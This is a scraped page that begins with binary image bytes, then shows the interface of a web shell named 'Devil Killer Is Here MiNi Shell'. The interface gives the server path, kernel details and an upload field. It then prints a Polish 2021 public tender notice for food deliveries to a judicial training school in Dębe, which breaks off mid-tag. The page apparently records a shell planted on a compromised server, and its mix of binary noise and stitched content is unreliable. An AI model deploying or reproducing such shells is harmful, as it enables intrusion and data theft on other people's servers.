JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211228/0033379201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy artykułów spożywczych na potrzeby Krajowej Szkoły Sądownictwa i Prokuratury, Ośrodek Szkoleniowy w Dębem. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowa Szkoła Sądownictwa i Prokuratury</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140580428</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Przy Rondzie 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-547</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@kssip.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.kssip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy artykułów spożywczych na potrzeby Krajowej Szkoły Sądownictwa i Prokuratury, Ośrodek Szkoleniowy w Dębem. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d36c9134-636f-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00333792</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00181816/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Sukcesywne dostawy artykułów spożywczych na potrzeby Krajowej Szkoły Sądownictwa i Prokuratury, Ośrodek Szkoleniowy w Dębem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.kssip.gov.pl/Postepowania_w_trybie_ustawy_Pzp <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.kssip.gov.pl/Postepowania_w_trybie_ustawy_Pzp</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja Wykonawców z Zamawiającym, w szczególności składanie ofert, wszelkich oświadczeń,<br/>wniosków, zawiadomień oraz informacji odbywa się przy użyciu środków komunikacji elektronicznej, za<br/>pośrednictwem kanału elektronicznej komunikacji pod adresem: https://www.soldea.pl/epz/epz/ .<br/>2. Oferta składana jest pod rygorem nieważności w formie elektronicznej tj. postaci elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>3. Szczegółowe informacje są zawarte w rozdziale 8 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzule informacyjne z art. 13 i art. 14 RODO znajdują się<br/>w SWZ, w zał. nr 1 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BA-X.2611.26.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 533973,74 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 413434,56 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">12</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa artykułów ogólnospożywczych dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 46531,52 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15430000-1 - Tłuszcze jadalne</p> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15613310-4 - Gotowe zboża śniadaniowe</p> <p class="mb-0">15820000-2 - Sucharki i herbatniki; wyroby piekarskie i ciastkarskie o przedłużonej trwałości</p> <p class="mb-0">15830000-5 - Cukier i produkty pokrewne</p> <p class="mb-0">15840000-8 - Kakao; czekolada i wyroby cukiernicze</p> <p class="mb-0">15850000-1 - Produkty z ciasta makaronowego</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <p class="mb-0">15860000-4 - Kawa, herbata i podobne produkty</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15891000-0 - Zupy i buliony</p> <p class="mb-0">15892000-7 - Wywary warzywne, ekstrakty, substancje peptydowe i zagęszczacze</p> <p class="mb-0">15893000-4 - Produkty suszone</p> <p class="mb-0">15894000-1 - Przetworzone produkty spożywcze</p> <p class="mb-0">15898000-9 - Drożdże</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa pieczywa dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 6642,68 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15811100-7 - Chleb</p> <p class="mb-0">15811400-0 - Bułeczki</p> <p class="mb-0">15813000-0 - Wyroby śniadaniowe</p> <p class="mb-0">15821000-9 - Pieczywo tostowe i wyroby piekarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa ciast i wyrobów ciastkarskich dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 49092,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15812100-4 - Wyroby ciastkarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15812000-3 - Wyroby ciastkarskie i ciasta</p> <p class="mb-0">15812200-5 - Ciasta</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa nabiału dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 12203,19 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15510000-6 - Mleko i śmietana</p> <p class="mb-0">15530000-2 - Masło</p> <p class="mb-0">15540000-5 - Produkty serowarskie</p> <p class="mb-0">15550000-8 - Klasyfikowane produkty mleczarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa mrożonek i wyrobów mącznych dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 22621,30 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15311000-1 - Ziemniaki mrożone</p> <p class="mb-0">15896000-5 - Produkty głęboko mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 